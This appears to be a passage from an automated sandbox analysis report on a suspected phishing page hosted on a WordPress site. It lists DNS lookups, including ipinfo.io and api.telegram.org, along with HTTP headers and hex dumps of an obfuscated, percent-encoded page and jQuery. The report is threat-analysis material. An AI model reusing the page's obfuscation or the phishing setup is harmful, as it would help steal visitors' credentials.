                                                                                                    Mar 10, 2025 13:50:44.746066093 CET1.1.1.1192.168.2.240x1042No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.747406960 CET1.1.1.1192.168.2.240x491cNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.780092001 CET1.1.1.1192.168.2.240xbbf0No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.780211926 CET1.1.1.1192.168.2.240x90bbNo error (0)www.google.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.490843058 CET1.1.1.1192.168.2.240xad1bNo error (0)image.thum.io54.156.104.133A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.490843058 CET1.1.1.1192.168.2.240xad1bNo error (0)image.thum.io98.83.245.220A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.490843058 CET1.1.1.1192.168.2.240xad1bNo error (0)image.thum.io44.218.42.246A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.500693083 CET1.1.1.1192.168.2.240x7b59No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.500693083 CET1.1.1.1192.168.2.240x7b59No error (0)ka-f.fontawesome.com.cdn.cloudflare.net104.21.26.223A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.500693083 CET1.1.1.1192.168.2.240x7b59No error (0)ka-f.fontawesome.com.cdn.cloudflare.net172.67.139.119A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.501178026 CET1.1.1.1192.168.2.240x7375No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.501178026 CET1.1.1.1192.168.2.240x7375No error (0)ka-f.fontawesome.com.cdn.cloudflare.net65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:57.100425005 CET1.1.1.1192.168.2.240x1195No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.607584000 CET1.1.1.1192.168.2.240x5cebNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.607584000 CET1.1.1.1192.168.2.240x5cebNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.611387968 CET1.1.1.1192.168.2.240xd904No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.986073017 CET1.1.1.1192.168.2.240x8502No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.988356113 CET1.1.1.1192.168.2.240xaeddNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.988356113 CET1.1.1.1192.168.2.240xaeddNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:04.605614901 CET1.1.1.1192.168.2.240x7c6dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.998354912 CET1.1.1.1192.168.2.240xb86aNo error (0)www.southwark.anglican.org141.193.213.21A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.998379946 CET1.1.1.1192.168.2.240xa481No error (0)www.southwark.anglican.org141.193.213.21A (IP address)IN (0x0001)false
                                                                                                    • kwikkopyegypt.com
                                                                                                      • code.jquery.com
                                                                                                      • cdnjs.cloudflare.com
                                                                                                      • www.google.com
                                                                                                      • image.thum.io
                                                                                                      • ipinfo.io
                                                                                                      • dns.google
                                                                                                      • api.telegram.org
                                                                                                    • www.southwark.anglican.org
                                                                                                    • c.pki.goog
                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    0192.168.2.2454019172.217.18.380
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Mar 10, 2025 13:51:47.093182087 CET200OUTGET /r/r1.crl HTTP/1.1
                                                                                                    Cache-Control: max-age = 3000
                                                                                                    Connection: Keep-Alive
                                                                                                    Accept: */*
                                                                                                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                    User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                    Host: c.pki.goog
                                                                                                    Mar 10, 2025 13:51:47.743175983 CET222INHTTP/1.1 304 Not Modified
                                                                                                    Date: Mon, 10 Mar 2025 12:48:15 GMT
                                                                                                    Expires: Mon, 10 Mar 2025 13:38:15 GMT
                                                                                                    Age: 212
                                                                                                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                    Cache-Control: public, max-age=3000
                                                                                                    Vary: Accept-Encoding


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.245397550.62.201.284436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:38 UTC723OUTGET /wp-admin/mail.verify/interface.root/login.php/inbox.html HTTP/1.1
                                                                                                    Host: kwikkopyegypt.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:38 UTC296INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 10 Mar 2025 12:50:38 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Last-Modified: Thu, 06 Mar 2025 21:56:20 GMT
                                                                                                    ETag: "1a60306-100a72-62fb39380a074"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 1051250
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Type: text/html
                                                                                                    2025-03-10 12:50:38 UTC7896INData Raw: ef bb bf 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 2f 2f 20 3d 3d 20 42 65 67 69 6e 20 46 72 65 65 20 48 54 4d 4c 20 53 6f 75 72 63 65 20 43 6f 64 65 20 4f 62 66 75 73 63 61 74 69 6f 6e 20 50 72 6f 74 65 63 74 69 6f 6e 20 66 72 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 6e 61 70 62 75 69 6c 64 65 72 2e 63 6f 6d 20 3d 3d 20 2f 2f 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 33 44 25 32 32 25 46 32 25 30 42 25 42 36 25 32 32 25 33 45 25 30 41 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 25 36 44 25 36 35 25 37 34 25 36 31
                                                                                                    Data Ascii: <script language="javascript">...// == Begin Free HTML Source Code Obfuscation Protection from https://snapbuilder.com == //document.write(unescape('%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%F2%0B%B6%22%3E%0A%0A%3C%68%65%61%64%3E%0A%20%20%3C%6D%65%74%61
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 25 36 39 25 37 32 25 36 33 25 36 43 25 36 35 25 32 44 25 36 46 25 32 44 25 37 35 25 37 30 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 32 32 25 34 36 25 36 46 25 36 45 25 37 34 25 32 30 25 34 31 25 37 37 25 36 35 25 37 33 25 36 46 25 36 44 25 36 35 25 32 30 25 33 35 25 32 30 25 34 36 25 37 32 25 36 35 25 36 35 25 32 32 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 37 25 36 35 25 36 39 25 36 37 25 36 38 25 37 34 25 33 41 25 32 30 25 33 34 25 33 30 25 33 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41
                                                                                                    Data Ascii: %69%72%63%6C%65%2D%6F%2D%75%70%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%22%46%6F%6E%74%20%41%77%65%73%6F%6D%65%20%35%20%46%72%65%65%22%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%34%30%30%0A%20%20%20%20%7D%0A%0A
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 32 25 32 44 25 36 33 25 36 38 25 36 31 25 37 32 25 37 34 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 32 32 25 34 36 25 36 46 25 36 45 25 37 34 25 32 30 25 34 31 25 37 37 25 36 35 25 37 33 25 36 46 25 36 44 25 36 35 25 32 30 25 33 35 25 32 30 25 34 36 25 37 32 25 36 35 25 36 35 25 32 32 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 37 25 36 35 25 36 39 25 36 37 25 36 38 25 37 34 25 33 41 25 32 30 25 33 34 25 33 30 25 33 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32
                                                                                                    Data Ascii: 2%2D%63%68%61%72%74%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%22%46%6F%6E%74%20%41%77%65%73%6F%6D%65%20%35%20%46%72%65%65%22%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%34%30%30%0A%20%20%20%20%7D%0A%0A%20%20%20%2
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 32 45 25 36 36 25 36 31 25 32 44 25 36 38 25 36 31 25 36 45 25 36 34 25 32 44 25 36 46 25 32 44 25 37 32 25 36 39 25 36 37 25 36 38 25 37 34 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 32 32 25 34 36 25 36 46 25 36 45 25 37 34 25 32 30 25 34 31 25 37 37 25 36 35 25 37 33 25 36 46 25 36 44 25 36 35 25 32 30 25 33 35 25 32 30 25 34 36 25 37 32 25 36 35 25 36 35 25 32 32 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 37 25 36 35 25 36 39 25 36 37 25 36 38 25 37 34 25 33 41 25 32 30 25 33 34 25 33 30 25 33 30 25 30 41 25 32 30 25
                                                                                                    Data Ascii: 2E%66%61%2D%68%61%6E%64%2D%6F%2D%72%69%67%68%74%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%22%46%6F%6E%74%20%41%77%65%73%6F%6D%65%20%35%20%46%72%65%65%22%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%34%30%30%0A%20%
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 25 32 45 25 36 36 25 36 31 25 32 44 25 37 30 25 36 31 25 37 33 25 37 34 25 36 35 25 33 41 25 36 32 25 36 35 25 36 36 25 36 46 25 37 32 25 36 35 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 33 25 36 46 25 36 45 25 37 34 25 36 35 25 36 45 25 37 34 25 33 41 25 32 30 25 32 32 25 35 43 25 36 36 25 33 33 25 33 32 25 33 38 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 36 43 25 36 39 25 36 37 25 36 38 25 37 34 25 36 32 25 37 35 25 36 43 25 36 32 25 32 44 25 36 46 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44
                                                                                                    Data Ascii: %2E%66%61%2D%70%61%73%74%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%22%5C%66%33%32%38%22%0A%20%20%20%20%7D%0A%0A%20%20%20%20%2E%66%61%2E%66%61%2D%6C%69%67%68%74%62%75%6C%62%2D%6F%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 33 25 37 34 25 36 31 25 37 32 25 32 44 25 36 38 25 36 31 25 36 43 25 36 36 25 32 44 25 36 46 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 32 32 25 34 36 25 36 46 25 36 45 25 37 34 25 32 30 25 34 31 25 37 37 25 36 35 25 37 33 25 36 46 25 36 44 25 36 35 25 32 30 25 33 35 25 32 30 25 34 36 25 37 32 25 36 35 25 36 35 25 32 32 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 37 25 36 35 25 36 39 25 36 37 25 36
                                                                                                    Data Ascii: D%0A%0A%20%20%20%20%2E%66%61%2E%66%61%2D%73%74%61%72%2D%68%61%6C%66%2D%6F%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%22%46%6F%6E%74%20%41%77%65%73%6F%6D%65%20%35%20%46%72%65%65%22%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%77%65%69%67%6
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 32 45 25 36 36 25 36 31 25 32 44 25 36 34 25 36 46 25 36 43 25 36 43 25 36 31 25 37 32 25 33 41 25 36 32 25 36 35 25 36 36 25 36 46 25 37 32 25 36 35 25 32 43 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 35 25 37 33 25 36 34 25 33 41 25 36 32 25 36 35 25 36 36 25 36 46 25 37 32 25 36 35 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 33 25 36 46 25 36 45 25 37 34 25 36 35 25 36 45 25 37 34 25 33 41 25 32 30 25 32 32 25 35 43 25 36 36 25 33 31 25 33 35 25 33 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 36 39 25
                                                                                                    Data Ascii: 2E%66%61%2D%64%6F%6C%6C%61%72%3A%62%65%66%6F%72%65%2C%0A%20%20%20%20%2E%66%61%2E%66%61%2D%75%73%64%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%22%5C%66%31%35%35%22%0A%20%20%20%20%7D%0A%0A%20%20%20%20%2E%66%61%2E%66%61%2D%69%
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 32 25 36 35 25 36 45 25 37 32 25 36 35 25 36 45 25 32 43 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 33 25 37 34 25 36 31 25 36 33 25 36 42 25 32 44 25 36 35 25 37 38 25 36 33 25 36 38 25 36 31 25 36 45 25 36 37 25 36 35 25 32 43 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 36 25 36 42 25 32 43 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 37 37 25 36 35 25 36 39 25 36 32 25 36 46 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45
                                                                                                    Data Ascii: %2E%66%61%2E%66%61%2D%72%65%6E%72%65%6E%2C%0A%20%20%20%20%2E%66%61%2E%66%61%2D%73%74%61%63%6B%2D%65%78%63%68%61%6E%67%65%2C%0A%20%20%20%20%2E%66%61%2E%66%61%2D%76%6B%2C%0A%20%20%20%20%2E%66%61%2E%66%61%2D%77%65%69%62%6F%20%7B%0A%20%20%20%20%20%20%66%6F%6E
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 44 25 36 46 25 33 41 25 36 32 25 36 35 25 36 36 25 36 46 25 37 32 25 36 35 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 33 25 36 46 25 36 45 25 37 34 25 36 35 25 36 45 25 37 34 25 33 41 25 32 30 25 32 32 25 35 43 25 36 36 25 33 31 25 36 33 25 33 31 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 36 36 25 36 39 25 36 43 25 36 35 25 32 44 25 37 37 25 36 46 25 37 32 25 36 34 25 32 44 25 36 46 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32
                                                                                                    Data Ascii: D%6F%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%22%5C%66%31%63%31%22%0A%20%20%20%20%7D%0A%0A%20%20%20%20%2E%66%61%2E%66%61%2D%66%69%6C%65%2D%77%6F%72%64%2D%6F%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%2
                                                                                                    2025-03-10 12:50:38 UTC8000INData Raw: 33 35 25 32 30 25 34 36 25 37 32 25 36 35 25 36 35 25 32 32 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 37 25 36 35 25 36 39 25 36 37 25 36 38 25 37 34 25 33 41 25 32 30 25 33 34 25 33 30 25 33 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 45 25 36 36 25 36 31 25 32 45 25 36 36 25 36 31 25 32 44 25 36 43 25 36 39 25 36 36 25 36 35 25 32 44 25 37 33 25 36 31 25 37 36 25 36 35 25 37 32 25 33 41 25 36 32 25 36 35 25 36 36 25 36 46 25 37 32 25 36 35 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 33 25 36 46 25 36 45 25 37 34 25 36 35 25 36 45 25 37 34 25 33 41 25 32 30 25
                                                                                                    Data Ascii: 35%20%46%72%65%65%22%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%34%30%30%0A%20%20%20%20%7D%0A%0A%20%20%20%20%2E%66%61%2E%66%61%2D%6C%69%66%65%2D%73%61%76%65%72%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.2453983151.101.130.1374436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:42 UTC658OUTGET /jquery-3.3.1.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:42 UTC611INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 271751
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-42587"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 214239
                                                                                                    Date: Mon, 10 Mar 2025 12:50:42 GMT
                                                                                                    X-Served-By: cache-lga21980-LGA, cache-ewr-kewr1740076-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 20, 0
                                                                                                    X-Timer: S1741611042.393338,VS0,VE1
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37
                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                    Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 63 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 0a 09 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 54 79 70 65 28 20 6f 62 6a 20 29 20 7b 0a 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 32 2e 33 20 6f 6e 6c 79 20 28 66 75 6e 63 74 69 6f 6e 69 73 68 20 52 65 67 45 78 70 29 0a 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 0a 09
                                                                                                    Data Ascii: c.head.appendChild( script ).parentNode.removeChild( script );}function toType( obj ) {if ( obj == null ) {return obj + "";}// Support: Android <=2.3 only (functionish RegExp)return typeof obj === "object" || typeof obj === "function" ?
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 7b 0a 09 09 09 72 65 74 75 72 6e 20 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 52 65 74 75 72 6e 20 6a 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 72 65 74 75 72 6e 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 20 65 6c 65 6d 65 6e 74 20 73 65 74 29 0a 09 70 75 73 68 53
